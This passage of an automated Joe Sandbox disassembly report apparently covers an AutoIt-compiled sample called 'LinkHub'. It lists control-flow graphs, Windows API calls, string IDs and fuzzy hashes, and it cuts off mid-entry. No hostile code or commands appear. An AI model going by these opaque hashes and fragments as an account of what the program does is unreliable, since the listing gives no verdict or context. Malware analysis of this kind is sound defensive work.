                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                    • String ID: #$0$AutoIt v3
                                                                    • API String ID: 423443420-4155596026
                                                                    • Opcode ID: b658688340be43c4e08aea617b9568eb5abbc4602618449e5f58c181b95c1b6d
                                                                    • Instruction ID: f3f5244a4a7c0d095a8d0b50dd83d27e1f63e63bf8f046c1d02ce8491f317da6
                                                                    • Opcode Fuzzy Hash: b658688340be43c4e08aea617b9568eb5abbc4602618449e5f58c181b95c1b6d
                                                                    • Instruction Fuzzy Hash: DF214F78D10314AFDB129FA5EC49BDABFB8FB0C750F00841BE614A62A0C3B90964CF94
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Variable must be of type 'Object'.$t51$t51$t51$t51$t51t51
                                                                    • API String ID: 0-1988557379
                                                                    • Opcode ID: 9460d6a9f78bec2374379db7bb344a12a7d95a3737e88ee8b487078ea3c213e4
                                                                    • Instruction ID: 73ff4fbb6fb2dfc447b9d53bdc56bf75cd5c7be5d4b1d521466abea7f417a86f
                                                                    • Opcode Fuzzy Hash: 9460d6a9f78bec2374379db7bb344a12a7d95a3737e88ee8b487078ea3c213e4
                                                                    • Instruction Fuzzy Hash: 06C29C75E20215CFCB28DF58C980AAEB7B1FF49304F248169E909AB391D371AD61CF91

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1063 242ab0-242ae9 1064 283a1a-283a1b DestroyWindow 1063->1064 1065 242aef-242b05 mciSendStringW 1063->1065 1068 283a26-283a33 1064->1068 1066 242d66-242d73 1065->1066 1067 242b0b-242b13 1065->1067 1070 242d75-242d90 UnregisterHotKey 1066->1070 1071 242d98-242d9f 1066->1071 1067->1068 1069 242b19-242b28 call 242ede 1067->1069 1073 283a62-283a69 1068->1073 1074 283a35-283a38 1068->1074 1084 283a70-283a7c 1069->1084 1085 242b2e-242b36 1069->1085 1070->1071 1076 242d92-242d93 call 242770 1070->1076 1071->1067 1072 242da5 1071->1072 1072->1066 1073->1068 1078 283a6b 1073->1078 1079 283a3a-283a42 call 247aab 1074->1079 1080 283a44-283a47 FindClose 1074->1080 1076->1071 1078->1084 1083 283a4d-283a5a 1079->1083 1080->1083 1083->1073 1086 283a5c-283a5d call 2b3cf6 1083->1086 1089 283a7e-283a80 FreeLibrary 1084->1089 1090 283a86-283a8d 1084->1090 1087 242b3c-242b61 call 24e6a0 1085->1087 1088 283a94-283aa1 1085->1088 1086->1073 1100 242b63 1087->1100 1101 242b98-242ba3 CoUninitialize 1087->1101 1095 283ac8-283acf 1088->1095 1096 283aa3-283ac0 VirtualFree 1088->1096 1089->1090 1090->1084 1094 283a8f 1090->1094 1094->1088 1095->1088 1099 283ad1 1095->1099 1096->1095 1098 283ac2-283ac3 call 2b3d5c 1096->1098 1098->1095 1103 283ad6-283ada 1099->1103 1104 242b66-242b96 call 2430c0 call 243069 1100->1104 1101->1103 1105 242ba9-242bae 1101->1105 1103->1105 1106 283ae0-283ae4 call 2b0b4c 1103->1106 1104->1101 1108 242bb4-242bbe 1105->1108 1109 283aeb-283af8 call 2b3d30 1105->1109 1114 283ae6 1106->1114 1112 242bc4-242c45 call 24bd98 call 242ff4 call 242e85 call 260184 call 242e1c call 24bd98 call 24e6a0 call 242eae call 260184 1108->1112 1113 242da7-242db4 call 25fb19 1108->1113 1121 283afa 1109->1121 1126 283aff-283b21 call 26013d 1112->1126 1153 242c4b-242c6f call 260184 1112->1153 1113->1112 1123 242dba 1113->1123 1114->1105 1121->1126 1123->1113 1132 283b23 1126->1132 1135 283b28-283b4a call 26013d 1132->1135 1140 283b4c 1135->1140 1143 283b51-283b73 call 26013d 1140->1143 1149 283b75 1143->1149 1152 283b7a-283b87 call 2a6e3b 1149->1152 1159 283b89 1152->1159 1153->1135 1158 242c75-242c99 call 260184 1153->1158 1158->1143 1163 242c9f-242cb9 call 260184 1158->1163 1162 283b8e-283b9b call 25bdf0 1159->1162 1167 283b9d 1162->1167 1163->1152 1169 242cbf-242ce3 call 242e85 call 260184 1163->1169 1170 283ba2-283baf call 2b3c8a 1167->1170 1169->1162 1178 242ce9-242cf1 1169->1178 1176 283bb1 1170->1176 1179 283bb6-283bc3 call 2b3d11 1176->1179 1178->1170 1180 242cf7-242d15 call 24bd98 call 242fba 1178->1180 1186 283bc5 1179->1186 1180->1179 1188 242d1b-242d29 1180->1188 1189 283bca-283bd7 call 2b3d11 1186->1189 1188->1189 1190 242d2f-242d65 call 24bd98 * 3 call 242f26 1188->1190 1194 283bd9 1189->1194 1194->1194
                                                                    APIs
                                                                    • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00242AF9
                                                                    • CoUninitialize.COMBASE ref: 00242B98
                                                                    • UnregisterHotKey.USER32(?), ref: 00242D7D
                                                                    • DestroyWindow.USER32(?), ref: 00283A1B
                                                                    • FreeLibrary.KERNEL32(?), ref: 00283A80
                                                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00283AAD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                    • String ID: close all
                                                                    • API String ID: 469580280-3243417748
                                                                    • Opcode ID: 3cfdf99caff493101b11ee284d725586fdf3864aa9c89cae29a2cd6fb8a09b41
                                                                    • Instruction ID: 233d1561f58305bafcdb392f6bafd4f56edfedfedf5e963d3019cf96559eb425
                                                                    • Opcode Fuzzy Hash: 3cfdf99caff493101b11ee284d725586fdf3864aa9c89cae29a2cd6fb8a09b41
                                                                    • Instruction Fuzzy Hash: D3D18D75722212CFCB19EF15C885A69F7A4BF04B14F5142AEE84A6B291CB31AD36CF44

                                                                    Control-flow Graph

                                                                    APIs
                                                                      • Part of subcall function 0024327E: MapVirtualKeyW.USER32(0000005B,00000000), ref: 002432AF
                                                                      • Part of subcall function 0024327E: MapVirtualKeyW.USER32(00000010,00000000), ref: 002432B7
                                                                      • Part of subcall function 0024327E: MapVirtualKeyW.USER32(000000A0,00000000), ref: 002432C2
                                                                      • Part of subcall function 0024327E: MapVirtualKeyW.USER32(000000A1,00000000), ref: 002432CD
                                                                      • Part of subcall function 0024327E: MapVirtualKeyW.USER32(00000011,00000000), ref: 002432D5
                                                                      • Part of subcall function 0024327E: MapVirtualKeyW.USER32(00000012,00000000), ref: 002432DD
                                                                      • Part of subcall function 00243205: RegisterWindowMessageW.USER32(00000004,?,00242964), ref: 0024325D
                                                                    • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00242A0A
                                                                    • OleInitialize.OLE32 ref: 00242A28
                                                                    • CloseHandle.KERNELBASE(00000000,00000000), ref: 00283A0D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                    • String ID: (&1$0$1$4'1$d(1$$1
                                                                    • API String ID: 1986988660-3177764644
                                                                    • Opcode ID: 8cda70185aceeedf3d80c4f0b9ce4166dd41be3294b2f1b960dc8c64c4b155fb
                                                                    • Instruction ID: 9aefa2be1375c508bef57e7a457f5083d839b04f4439553ed5afc0229f9bc375
                                                                    • Opcode Fuzzy Hash: 8cda70185aceeedf3d80c4f0b9ce4166dd41be3294b2f1b960dc8c64c4b155fb
                                                                    • Instruction Fuzzy Hash: 527172B49216008FC78BDF7AADA56D7BAEAFB4E304B51C12AE408C7361EB7044758F54

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1246 2790c5-2790d5 1247 2790d7-2790ea call 26f636 call 26f649 1246->1247 1248 2790ef-2790f1 1246->1248 1264 279471 1247->1264 1250 2790f7-2790fd 1248->1250 1251 279459-279466 call 26f636 call 26f649 1248->1251 1250->1251 1254 279103-27912e 1250->1254 1269 27946c call 272b5c 1251->1269 1254->1251 1257 279134-27913d 1254->1257 1260 279157-279159 1257->1260 1261 27913f-279152 call 26f636 call 26f649 1257->1261 1262 279455-279457 1260->1262 1263 27915f-279163 1260->1263 1261->1269 1268 279474-279479 1262->1268 1263->1262 1267 279169-27916d 1263->1267 1264->1268 1267->1261 1272 27916f-279186 1267->1272 1269->1264 1275 2791a3-2791ac 1272->1275 1276 279188-27918b 1272->1276 1279 2791ae-2791c5 call 26f636 call 26f649 call 272b5c 1275->1279 1280 2791ca-2791d4 1275->1280 1277 279195-27919e 1276->1277 1278 27918d-279193 1276->1278 1283 27923f-279259 1277->1283 1278->1277 1278->1279 1308 27938c 1279->1308 1281 2791d6-2791d8 1280->1281 1282 2791db-2791f9 call 273b93 call 272d38 * 2 1280->1282 1281->1282 1316 279216-27923c call 2797a4 1282->1316 1317 2791fb-279211 call 26f649 call 26f636 1282->1317 1285 27925f-27926f 1283->1285 1286 27932d-279336 call 27fc1b 1283->1286 1285->1286 1289 279275-279277 1285->1289 1299 2793a9 1286->1299 1300 279338-27934a 1286->1300 1289->1286 1293 27927d-2792a3 1289->1293 1293->1286 1297 2792a9-2792bc 1293->1297 1297->1286 1304 2792be-2792c0 1297->1304 1306 2793ad-2793c5 ReadFile 1299->1306 1300->1299 1302 27934c-27935b GetConsoleMode 1300->1302 1302->1299 1307 27935d-279361 1302->1307 1304->1286 1309 2792c2-2792ed 1304->1309 1311 2793c7-2793cd 1306->1311 1312 279421-27942c GetLastError 1306->1312 1307->1306 1313 279363-27937d ReadConsoleW 1307->1313 1314 27938f-279399 call 272d38 1308->1314 1309->1286 1315 2792ef-279302 1309->1315 1311->1312 1320 2793cf 1311->1320 1318 279445-279448 1312->1318 1319 27942e-279440 call 26f649 call 26f636 1312->1319 1323 27937f GetLastError 1313->1323 1324 27939e-2793a7 1313->1324 1314->1268 1315->1286 1328 279304-279306 1315->1328 1316->1283 1317->1308 1325 279385-27938b call 26f613 1318->1325 1326 27944e-279450 1318->1326 1319->1308 1322 2793d2-2793e4 1320->1322 1322->1314 1333 2793e6-2793ea 1322->1333 1323->1325 1324->1322 1325->1308 1326->1314 1328->1286 1336 279308-279328 1328->1336 1339 279403-27940e 1333->1339 1340 2793ec-2793fc call 278de1 1333->1340 1336->1286 1345 279410 call 278f31 1339->1345 1346 27941a-27941f call 278c21 1339->1346 1351 2793ff-279401 1340->1351 1352 279415-279418 1345->1352 1346->1352 1351->1314 1352->1351
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c52172fb6752b01553cf7bec6da202e04325e31b0314e4e76d7b1eb36b699c4c
                                                                    • Instruction ID: 0fa42c9c81a6a6a10bcab7965b0a39e2f4097dba4b9524df40e59ab6d49fcb1b
                                                                    • Opcode Fuzzy Hash: c52172fb6752b01553cf7bec6da202e04325e31b0314e4e76d7b1eb36b699c4c
                                                                    • Instruction Fuzzy Hash: 3DC1F47192434AAFDF11DFA8D845BADBBB4AF09310F048199E518A7392C7709DA2CF61

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1354 2435b3-243623 CreateWindowExW * 2 ShowWindow * 2
                                                                    APIs
                                                                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 002435E1
                                                                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00243602
                                                                    • ShowWindow.USER32(00000000,?,?,?,?,?,?,00243368,?), ref: 00243616
                                                                    • ShowWindow.USER32(00000000,?,?,?,?,?,?,00243368,?), ref: 0024361F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Window$CreateShow
                                                                    • String ID: AutoIt v3$edit
                                                                    • API String ID: 1584632944-3779509399
                                                                    • Opcode ID: d5f993209a22ed18a70ec7fa276786d4d9dcef09691dec4b4291d21ca2aa082b
                                                                    • Instruction ID: 84aedb8042bce8527849316843ca2123c47566303b936cb34a318ed4ae07b7c3
                                                                    • Opcode Fuzzy Hash: d5f993209a22ed18a70ec7fa276786d4d9dcef09691dec4b4291d21ca2aa082b
                                                                    • Instruction Fuzzy Hash: 2EF03A78A402947AE73207136C0CFB72FBDD7CBF10F00841EB914A7260C2691C61DAB0

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1355 2b1196-2b11bf InterlockedExchange 1356 2b11cd-2b11f6 call 26017b ReadFile 1355->1356 1357 2b11c1-2b11c8 call 26017b 1355->1357 1362 2b12ae-2b12b2 1356->1362 1363 2b11fc-2b1200 1356->1363 1357->1356 1366 2b12c1-2b12d0 InterlockedExchange 1362->1366 1367 2b12b4-2b12c0 call 260184 1362->1367 1364 2b12a8-2b12ab 1363->1364 1365 2b1206-2b121b EnterCriticalSection 1363->1365 1364->1362 1368 2b1269-2b12a2 call 261190 LeaveCriticalSection ReadFile 1365->1368 1369 2b121d-2b122c 1365->1369 1367->1366 1368->1363 1368->1364 1372 2b122e 1369->1372 1373 2b1234-2b1266 call 282430 call 26017b call 261190 call 260184 1369->1373 1372->1373 1373->1368
                                                                    APIs
                                                                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 002B11B3
                                                                    • ReadFile.KERNELBASE(?,?,0000FFFF,?,00000000), ref: 002B11EE
                                                                    • EnterCriticalSection.KERNEL32(?), ref: 002B120A
                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 002B1283
                                                                    • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 002B129A
                                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 002B12C8
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                    • String ID:
                                                                    • API String ID: 3368777196-0
                                                                    • Opcode ID: f2ded9653fe0922f03ef90f54e15f36ac3f4026a2df0ecbd62aecd2e4f729900
                                                                    • Instruction ID: a4234f9e0121aa27e14a5611f23c860047ba72cf0f056097bcb7de782f2300a3
                                                                    • Opcode Fuzzy Hash: f2ded9653fe0922f03ef90f54e15f36ac3f4026a2df0ecbd62aecd2e4f729900
                                                                    • Instruction Fuzzy Hash: FE415B71910205EFDF05AF54DCC5AAAB7B8FF05310F1480A5ED049A296D730EE61DFA4

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00285287
                                                                      • Part of subcall function 00248577: _wcslen.LIBCMT ref: 0024858A
                                                                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00246299
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: IconLoadNotifyShell_String_wcslen
                                                                    • String ID: Line %d: $AutoIt -
                                                                    • API String ID: 2289894680-4094128768
                                                                    • Opcode ID: b99cb178ce35374e70f2cbc1a90828c714358993858622b127d3a7f1edb411db
                                                                    • Instruction ID: e5d2f196c7b9285c1fde22ec4aa02cc295da9971351729c05bcc856a4cec543b
                                                                    • Opcode Fuzzy Hash: b99cb178ce35374e70f2cbc1a90828c714358993858622b127d3a7f1edb411db
                                                                    • Instruction Fuzzy Hash: F041D571428311AAC716EB20EC45ADF77DCAF49310F004A2EF99992091EF70DA69CB93

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1435 278a2e-278a42 call 275737 1438 278a44-278a46 1435->1438 1439 278a48-278a50 1435->1439 1440 278a96-278ab6 call 2756a6 1438->1440 1441 278a52-278a59 1439->1441 1442 278a5b-278a5e 1439->1442 1451 278ac4 1440->1451 1452 278ab8-278ac2 call 26f613 1440->1452 1441->1442 1444 278a66-278a7a call 275737 * 2 1441->1444 1445 278a60-278a64 1442->1445 1446 278a7c-278a8c call 275737 CloseHandle 1442->1446 1444->1438 1444->1446 1445->1444 1445->1446 1446->1438 1454 278a8e-278a94 GetLastError 1446->1454 1456 278ac6-278ac9 1451->1456 1452->1456 1454->1440
                                                                    APIs
                                                                    • CloseHandle.KERNELBASE(00000000,00000000,?,OV(,0027894C,?,00309CE8,0000000C,002789AB,?,OV(,?,0028564F), ref: 00278A84
                                                                    • GetLastError.KERNEL32 ref: 00278A8E
                                                                    • __dosmaperr.LIBCMT ref: 00278AB9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: CloseErrorHandleLast__dosmaperr
                                                                    • String ID: OV(
                                                                    • API String ID: 2583163307-1574126023
                                                                    • Opcode ID: 4a46b77b93ae151acaee3d30a0c47c4e59761beacbd7060b843e5e14d73a4b16
                                                                    • Instruction ID: 88168573b071c8aefff433682f73122ec6882d8044a50f60a75c5df1fb887a7c
                                                                    • Opcode Fuzzy Hash: 4a46b77b93ae151acaee3d30a0c47c4e59761beacbd7060b843e5e14d73a4b16
                                                                    • Instruction Fuzzy Hash: 08018E32AB65B11BC7246634AC4E77EA7494B82734F25821BF91C8F1C2DFB08CA14980
                                                                    APIs
                                                                    • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,002458BE,SwapMouseButtons,00000004,?), ref: 002458EF
                                                                    • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,002458BE,SwapMouseButtons,00000004,?), ref: 00245910
                                                                    • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,002458BE,SwapMouseButtons,00000004,?), ref: 00245932
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: CloseOpenQueryValue
                                                                    • String ID: Control Panel\Mouse
                                                                    • API String ID: 3677997916-824357125
                                                                    • Opcode ID: 151547d154beb579e6bb7c2f937fac9baf5b2b28da92af8cc5c5205c31631608
                                                                    • Instruction ID: ec2581552fce3b03e40830a0e074c66bd92bbf331b3720931847f564bbd09bfc
                                                                    • Opcode Fuzzy Hash: 151547d154beb579e6bb7c2f937fac9baf5b2b28da92af8cc5c5205c31631608
                                                                    • Instruction Fuzzy Hash: B3117C75521628FFDB258F64DC84EAE7BBCEF45760F108419F841E7210E2719E5197A0
                                                                    APIs
                                                                    • __Init_thread_footer.LIBCMT ref: 00253006
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Init_thread_footer
                                                                    • String ID: CALL$bn*
                                                                    • API String ID: 1385522511-2165551917
                                                                    • Opcode ID: a8608ef9f471d4c40391cd565eed9105bbdd0edcbd8669c673049d2e936684cb
                                                                    • Instruction ID: 111fff1a2a157d43bcc8823db2a113116deea5f27f2dc22aec9d01ac3217d974
                                                                    • Opcode Fuzzy Hash: a8608ef9f471d4c40391cd565eed9105bbdd0edcbd8669c673049d2e936684cb
                                                                    • Instruction Fuzzy Hash: D4229D70628202DFCB14CF24C485A2ABBF1BF85315F14895DF8898B3A1D771E969CF56
                                                                    APIs
                                                                    • GetOpenFileNameW.COMDLG32(?), ref: 0028413B
                                                                      • Part of subcall function 00245851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,002455D1,?,?,00284B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00245871
                                                                      • Part of subcall function 00243A57: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00243A76
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Name$Path$FileFullLongOpen
                                                                    • String ID: X$`u0
                                                                    • API String ID: 779396738-3713482049
                                                                    • Opcode ID: 741b2d84528d9a22bcea3d201048dccafb95d55a60b9bdfaeab22d2a033fdf6c
                                                                    • Instruction ID: 29352209025445a3435995beb008ff36d4c54617989d3b5c4421b9b21f92ab86
                                                                    • Opcode Fuzzy Hash: 741b2d84528d9a22bcea3d201048dccafb95d55a60b9bdfaeab22d2a033fdf6c
                                                                    • Instruction Fuzzy Hash: C421C371E202589BCB05DF94C809BEE7BFCAF49304F00801AE545A7281DBF49A998F61
                                                                    APIs
                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 002609D8
                                                                      • Part of subcall function 00263614: RaiseException.KERNEL32(?,?,?,002609FA,75912E40,?,?,?,?,?,?,?,002609FA,?,00309758), ref: 00263674
                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 002609F5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
